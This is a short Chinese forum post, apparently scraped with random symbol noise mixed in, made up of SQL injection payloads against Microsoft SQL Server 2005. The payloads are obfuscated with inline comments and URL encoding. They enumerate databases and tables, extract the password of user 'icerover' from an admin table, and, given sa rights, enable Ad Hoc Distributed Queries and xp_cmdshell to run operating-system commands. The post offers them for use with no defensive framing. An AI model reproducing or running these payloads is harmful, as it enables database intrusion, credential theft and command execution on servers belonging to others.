) h" [% S+ a4 a* M" E
2 F$ e" T% M% G& e `& ~8 I2 S; z* Q; T7 O0 ], u; i
[Copy to clipboard]CODE:
/ j3 @. l. @8 ?/ _0 y+ g/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
" u* y; y$ d- m5 r, G( u6 N& Y8 B9 e% M& Q3 D' ~, |$ |
爆表语句,somedb部份是所要列的数据库,红色数字1累加
6 m m g$ P$ l$ R- c
" {$ J8 L* _8 W3 `# f; p2 f9 G$ S( E$ {2 x1 y$ G
[Copy to clipboard]CODE:0 p/ a; p+ h. N$ E1 Z6 s$ K
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--1 B& \- E$ I& W3 [% H
6 X1 \2 C0 w: a爆字段语句,爆表admin里user='icerover'的密码段( h( Y7 P( j- X& q: v
4 V S( n' {& H1 n( J6 k
8 `& h% M* e# u8 L8 ?( f5 N i' t" |% w
[Copy to clipboard]CODE:; ~2 ?& l8 j$ {- N; e' V: X
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
8 o% Y! m" |# k& j
g1 a; }; e) D5 F$ m% D7 T+ ]mssql2005默认没有开xp_cmdshell的,openrowset也不能用
K6 {( z$ V# z1 a7 a如果是sa权限,可以这样来开启4 [# _- R A* r4 Q
开启openrowset
5 ]8 | t5 b* s8 ^/ K( g# H ?( ^
! X2 v2 w) R8 h( S1 e+ E8 ?" `5 `$ a! H5 B3 H: P; E# X3 X2 I8 }) P% S
[Copy to clipboard]CODE:
5 ~4 u: C# @( e5 |! r/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
' q1 m- P* y4 b/ F+ `( Z/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
# y4 }5 S0 a4 q# u+ G9 ~& H
1 ]+ k3 B1 ]# W0 m5 @4 ]) k开启xp_cmdshell* |! U. X/ q+ l
$ C' d" N% q P4 L$ `( Z; `& {8 D6 ^4 \; k% n- V$ w8 k4 W
[Copy to clipboard]CODE:
( D, ~. E Z# \" AEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
! \/ A. ~$ x9 \6 v0 r% z3 KEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--; ]/ n. o! n, h& _6 V" D
0 e0 U; \& k2 v3 A W& o) L; R
ok,over~~晚安
; O" q* ~3 G7 o* i |